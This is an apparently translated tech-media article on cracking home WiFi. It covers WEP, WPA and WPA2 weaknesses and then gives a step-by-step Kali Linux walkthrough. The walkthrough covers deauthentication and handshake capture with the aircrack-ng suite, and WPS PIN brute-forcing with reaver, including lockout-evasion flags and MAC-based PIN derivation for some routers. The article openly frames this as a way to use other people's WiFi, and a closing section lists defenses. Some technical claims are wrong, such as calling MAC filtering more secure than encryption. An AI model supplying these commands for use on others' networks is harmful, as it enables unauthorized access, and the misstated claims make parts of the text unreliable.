Everyone has probably experienced that feeling when the WiFi in their home seems to be slowing down, wondering, “Is someone using my WiFi?” Sometimes, when we go out, we also want to try to use someone else’s WiFi. The premise of “borrowing WiFi” is to crack the other party’s “wireless password”. So, how secure is this “wireless password”? What are the technical principles behind it? And how can we prevent others from “borrowing” our WiFi?
Today, we will sort out the “password cracking techniques and principles of wireless WiFi networks” in this article!
1. WiFi Encryption Methods
This section explains the WiFi encryption methods used in wireless routers.
Currently, the encryption modes available in wireless routers mainly include: WEP, WPA-PSK(TKIP), WPA2-PSK(AES), and WPA-PSK(TKIP) + WPA2-PSK(AES).
1. WEP (Wired Equivalent Privacy) (Easily Cracked)
WEP is short for Wired Equivalent Privacy, a security protocol defined in the 802.11b standard for wireless local area networks (WLAN). WEP is used to provide a level of security equivalent to that of a wired LAN. LAN is inherently more secure than WLAN because its physical structure protects it, with parts or the entire network buried within buildings, preventing unauthorized access. WLAN, transmitted via radio waves, lacks the same physical structure and is therefore more vulnerable to attacks and interference. The goal of WEP is to provide security by encrypting the data in the radio waves, similar to end-to-end transmission. WEP uses the RC4 PRNG algorithm developed by RSA Data Security. If your wireless base station supports MAC filtering, it is recommended to use this feature along with WEP (MAC filtering is much more secure than encryption). Despite its name suggesting a security option for wired networks, this is not the case.
The WEP standard was created in the early days of wireless networks to serve as a necessary layer of security for WLAN, but its performance has been disappointing. The root cause lies in design flaws. In systems using WEP, the data transmitted over the wireless network is encrypted using a randomly generated key. However, the method used by WEP to generate these keys was quickly found to be predictable, making it easy for potential intruders to intercept and crack these keys. Even a moderately skilled wireless hacker can crack WEP encryption in just two to three minutes.
The dynamic WEP mode of IEEE 802.11 was designed in the late 1990s when powerful encryption technology faced strict export restrictions in the U.S. due to fears of strong encryption algorithms being cracked. Wireless network products were banned from export. However, just two years later, serious flaws were discovered in the dynamic WEP mode. The mistakes of the 1990s should not be blamed on wireless network security or the IEEE 802.11 standard itself; the wireless industry could not wait for the IEEE to revise the standards, so they introduced the TKIP (Temporal Key Integrity Protocol), a patch version of dynamic WEP.
Although WEP has been proven outdated and ineffective, it is still supported as an encryption mode in many modern wireless access points and routers today. Moreover, it remains one of the most commonly used encryption methods by individuals or companies. If you are using WEP encryption and care about the security of your network, it is advisable to stop using WEP as soon as possible, as it is not secure.
2. WPA-PSK (TKIP) (Higher Security, but Can Also Be Cracked)
The initial security mechanism adopted by wireless networks was WEP (Wired Equivalent Privacy), but it was later found to be insecure. The 802.11 organization began working on new security standards, which later became the 802.11i protocol. However, the formulation of the standard took a long time, and considering that consumers would not abandon their original wireless devices for network security, the Wi-Fi Alliance developed a security mechanism called WPA (Wi-Fi Protected Access) based on the draft of 802.11i before the standard was released. It uses TKIP (Temporal Key Integrity Protocol) and employs the same encryption algorithm (RC4) used in WEP, so there is no need to modify the hardware of existing wireless devices. WPA addresses the issues in WEP: short IV, overly simple key management, and lack of effective protection for message integrity, thus improving network security through software upgrades.
WPA provides users with a complete authentication mechanism, where the AP decides whether to allow users to access the wireless network based on the authentication results; once authenticated, it can dynamically change the encryption keys for each accessing user based on various factors (such as the number of data packets transmitted or the time the user has been connected to the network). Additionally, it encodes the data packets transmitted by users in wireless networks with MIC, ensuring that user data cannot be altered by other users. As a subset of the 802.11i standard, WPA’s core consists of IEEE 802.1x and TKIP.
WPA considers the security needs of different users and applications. For example, enterprise users require high levels of security protection (enterprise-level), as they may leak very important business secrets; while home users often use the network just for browsing the Internet, sending and receiving emails, printing, and sharing files, which have relatively lower security requirements. To meet the needs of users with different security requirements, WPA specifies two application modes: enterprise mode and home mode (including small offices). Based on these two different application modes, WPA’s authentication also has two different methods.
For large enterprises, the “802.1x + EAP” method is commonly used, where users provide credentials for authentication. However, for small and medium-sized enterprise networks or home users, WPA also provides a simplified mode that does not require a dedicated authentication server. This mode is called “WPA Pre-Shared Key (WPA-PSK)”, which only requires entering a key in advance on each WLAN node (AP, wireless router, network card, etc.) to achieve authentication. This key is only used for the authentication process and not for data transmission encryption. The data encryption key is generated dynamically after successful authentication, ensuring that “one household has one key”, avoiding the situation where a single encryption key is shared across the entire network, thus greatly enhancing system security.
3. WPA2-PSK (AES) (Higher Security, Increased Cracking Difficulty)
After the 802.11i was issued, the Wi-Fi Alliance launched WPA2, which supports AES (Advanced Encryption Standard), requiring new hardware support, and uses CCMP (Counter Mode Cipher Block Chaining Message Authentication Code Protocol). In WPA/WPA2, the generation of PTK depends on PMK, which can be obtained in two ways: one is in the form of PSK, meaning PMK = PSK, and the other requires an authentication server and site negotiation to produce PMK.
IEEE 802.11 establishes technical standards, while the Wi-Fi Alliance sets commercialization standards, which generally comply with the technical standards set by IEEE. WPA (Wi-Fi Protected Access) is a security standard formulated by the Wi-Fi Alliance, aimed at supporting the IEEE 802.11i technical security standard. WPA2 is essentially the second version of WPA. The reason for having two versions of WPA is due to the commercialization operations of the Wi-Fi Alliance.
We know that the purpose of the IEEE 802.11 task force is to create a more secure wireless local area network. Therefore, in the encryption project, two new security encryption protocols were specified: TKIP and CCMP (some wireless network devices may refer to CCMP as AES or AES-CCMP). While TKIP made significant improvements addressing the weaknesses of WEP, it retained the RC4 algorithm and basic architecture, implying that TKIP also inherits the weaknesses inherent in RC4. Therefore, IEEE 802.11 created a completely new, stronger, and more suitable encryption protocol for wireless LAN environments: CCMP. However, before CCMP was ready, TKIP was already completed. To expedite the deployment of the new security standard and alleviate users’ concerns regarding wireless network security, thus allowing the wireless LAN market to expand rapidly, the Wi-Fi Alliance based WPA on the completed TKIP and the draft 3 of IEEE 802.11i. Once the IEEE completed and published the IEEE 802.11i wireless LAN security standard, the Wi-Fi Alliance promptly released WPA version 2 (WPA2). WPA = IEEE 802.11i draft 3 = IEEE 802.1X/EAP + WEP (optional) / TKIP; WPA2 = IEEE 802.11i = IEEE 802.1X/EAP + WEP (optional) / TKIP/CCMP.
4. The last encryption mode is WPA-PSK (TKIP) + WPA2-PSK (AES)
This is currently the highest encryption mode in wireless routers. Due to compatibility issues, this encryption mode has not been widely used by many users. The most widely used modes are WPA-PSK (TKIP) and WPA2-PSK (AES). It is believed that a wireless network secured with encryption will allow our users to surf the internet with peace of mind. Therefore, this method is highly secure but has not been widely used due to compatibility issues.
2. Methods for Cracking WiFi Network Passwords
1. Main Methods:
Non-technical cracking methods, such as using apps like “WiFi Master Key” to borrow WiFi.
After capturing the handshake packets between the client and the target WiFi, implement a dictionary-based brute-force crack, with the success rate depending on the target WiFi’s password strength, the size or accuracy of the dictionary, and the computational power of the machine used for cracking.
For WiFi with WPS enabled, use the PIN guessing method to obtain the WiFi password.
2. Principles:
The real principle of “WiFi Master Key”-like apps is to collect the WiFi accounts and passwords that users’ phones have successfully connected to and upload and store them on the app’s server. When nearby users search for the same network, the app can automatically match and obtain the corresponding password based on the configuration information of nearby hotspots from the server, sending it to the phone via data traffic, thus completing the WiFi connection.
(1) Brute-force Cracking Principles
Ordinary wireless routers generally use WPA, WPA2, or WEP encryption methods. WEP is too insecure and easily cracked, and is basically eliminated from current wireless routers. Therefore, the WiFi we search for to crack is mostly WPA or WPA2 encrypted. As for WPA authentication using an authentication server (like RADIUS) in personal wireless WiFi scenarios, it is generally not possible, so the WiFi we can find to crack is mostly based on local password WPA or WPA2 encrypted WiFi.
The basic principle of cracking WPA and WPA2 encrypted WiFi networks can be simply explained as follows: We need to collect information about the target WiFi in monitor mode on the wireless network card, such as SSID (WiFi name), BSSID (the MAC address of the target WiFi router), the MAC of connected clients, signal strength, etc. Then, we send a forged de-authentication data packet to force connected clients to disconnect from the WiFi. The key point is that after disconnection, the client will attempt to reconnect to the WiFi network, sending an authentication data packet containing the authentication password. This packet is commonly referred to as the handshake packet. At this time, our attacking machine uses an attack program and wireless network card to capture this handshake packet, which contains the WiFi password, but this password is encrypted. Therefore, we need to use the attack program to call the password dictionary in conjunction with the obtained BSSID and client MAC information for computation, continuously calculating each password in the dictionary until one password matches the encrypted string in the captured handshake packet using the WPA algorithm. This password is the target WiFi password. If none of the passwords in the dictionary match the encrypted string of the captured handshake packet after trying all of them, the cracking fails, and we exit and construct a new dictionary to try again.
(2) PIN Code Cracking WiFi Passwords
In early wireless routers with WPS enabled, this function was designed to facilitate device connection to WiFi without the need to repeatedly enter a password, establishing an 8-digit pure numeric string. Clients can quickly associate with the router WiFi using the PIN code. The original intention of the WPS function was to make it easier for users to connect to WiFi, but it has become one of the most effective means of cracking WiFi because the 8-digit pure numeric PIN code has a maximum of 100 million possible combinations. Since the last digit is a checksum of the first seven digits, we only need to guess the first seven digits, reducing the number of possible combinations to just 10 million. Additionally, since the error messages returned for incorrect guesses of the first four digits differ from those for the last three digits, we only need to guess the first four digits correctly before guessing the last three. Once all are correct, the last checksum digit can be automatically calculated. Therefore, theoretically, we only need to guess at most 10,000 + 1,000 combinations. If we try one PIN code every two seconds, we can theoretically crack the target router’s PIN code in a maximum of 6 hours.
It should be noted that although PIN code cracking is considered the most effective WiFi cracking method, it is not easy to implement in practice. First, the insecurity of the PIN code has been widely recognized by wireless router manufacturers, so most routers purchased today have already disabled this WPS function. Second, in the process of guessing the PIN, we need to continuously send PIN codes to the target router for trial, and the target router must return response packets. Sometimes, due to the instability of the router itself or performance issues, the router may become unresponsive, preventing further guessing or leading to the router automatically resting for a period after receiving too many incorrect PIN codes, causing the guessing process to take too long and become meaningless.
3. Example of the Cracking Process
1. Preparation Tools
-
Laptop
-
USB Wireless Network Card (Essential)
-
Kali System
-
Password Dictionary
2. First Method: Brute-force Cracking
What is brute-force cracking? It is actually trying one password at a time until the correct password is found.
Currently, WiFi encryption generally includes:
WEP (Wired Equivalent Privacy) — Uses WEP 64-bit or 128-bit data encryption.
WPA-PSK [TKIP] — Uses pre-shared key Wi-Fi Protected Access, employing WPA-PSK standard encryption technology with TKIP as the encryption type.
WPA-PSK [TKIP] + WPA2-PSK [AES] — Allows clients to use either WPA-PSK [TKIP] or WPA2-PSK [AES].
3. Start the Experiment:
(1) First Step
Enter Kali and input the following command in the terminal:
airmon-ngList network card information
(2) Second Step
Input:
airmon-ng start wlan0Start the network card in monitor mode
You can use the ifconfig command to check the network card information:
ifconfigYou can see that the name of the network card has changed
(3) Third Step
airodump-ng wlan0monScan for WiFi signals
Here, I am testing with my home WiFi
(4) Fourth Step
As shown above,
BSSID is 50:3A:A0:33:B2:8C and Channel (CH) is: 2
Input:
airodump-ng -w freedom -c 2 --bssid 50:3A:A0:33:B2:8C wlan0mon --ignore-negative-oneCapture the handshake packet
-c: Specify the channel
-w: Specify the storage location or name of the captured handshake packet; freedom is the name of the captured handshake packet
–bssid: Specify the router’s MAC
(5) Fifth Step
Open another terminal and input the command:
aireplay-ng --deauth 10 -a routerMAC -c clientMAC wlan0mon --ignore-negative-oneUse the aireplay-ng tool to forcibly disconnect devices already connected to the WiFi to capture data packets
–deauth: Specify the number of de-authentication packets to send; you can also use -0 (the number zero) to specify the number of de-authentication packets
-a: Specify the router’s MAC
-c: Specify the client’s MAC
(6) Sixth Step
Crack the handshake packet
aircrack-ng -a -w dict freedom-*.cap-
-a1: Specify WEP encryption mode
-
-a2: Specify WPA-PSK encryption mode
-
dict: Name of the dictionary
-
freedom-*.cap: Handshake packet
This is my WiFi password
Cracking completed; success depends on a powerful dictionary and luck.
4. Second Method
(1) First Step
Scan for networks with WPS enabled using Wash
wash -i wlan0mon [-C]
Since there are no nearby WiFi networks with WPS enabled, do not panic, as some may be hidden. We can directly use the previous command to scan for WiFi:
airodump-ng wlan0mon
Look for the MAC circled by the editor; choose a WiFi with a PWR value less than 70 to crack.
(2) Second Step
Select a router
I chose the WiFi named: FAST_F70E
That’s it: E4:D3:32:7F:F7:0E -45 2 0 0 6 54e. WPA2 CCMP PSK FAST_F70E
Then the command is as follows:
reaver -i mon0 -b E4:D3:32:7F:F7:0E -a -S -vvE4:D3:32:7F:F7:0E; this MAC should be replaced with the router’s MAC.
If the image above indicates it can be cracked, WPS is enabled.
If the image above shows it cannot be cracked, try cracking another WiFi.
This indicates that it has been cracked.
Notes:
If the password has been changed, and you know the WiFi’s PIN code, use the following command: reaver -i mon0 -b MAC -p PIN
The PIN code has 8 digits, so it requires 10^8 attempts, totaling 1 billion tries.
However, there are limitations on the PIN; for the PIN to be cracked, the router must have WPS enabled. Many are now WPS disabled or have a 300-second pin restriction.
Some router PINs can be calculated: for Tenda and Leike products, if the router’s MAC address starts with “C83A35” or “00B00C”, the PIN value can be directly calculated.
For example, this: BSSID: Tenda_579A18 MAC: C8:3A:35:57:9A:18. Convert the last 6 digits of the MAC to decimal to get 5741080 (the first 7 digits of the PIN code), and you can try a maximum of 10 times or use software to obtain the router’s PIN code!
When cracking, it is recommended to use this command:
reaver -i mon0 -b E4:D3:32:7F:F7:0E -a -S -d9 -t9 -vvBecause the parameters -d9 -t9 can prevent the router from being pinned.
4. How to Prevent WiFi Theft
(1) Set a complex password that includes characters, symbols, and numbers, with a length of at least 12 characters. The more complex the wireless password, the harder it is for others to crack. Choose WPA-PSK/WPA2-PSK encryption methods.
(2) Hide your wireless network name.
When we hide the wireless authentication, others cannot find our network connection point, making it impossible to connect to our network. Click on the wireless basic settings in the upper left corner of the router page. On the right, you will see an option for SSID service broadcasting. Uncheck the box in front of it and click save below to hide the wireless signal.
(3) Set up a whitelist and enable MAC address filtering, manually adding the MAC addresses of your home internet-enabled devices. This way, even if someone cracks the WiFi password, they cannot access the internet.
Source:51CTO Media
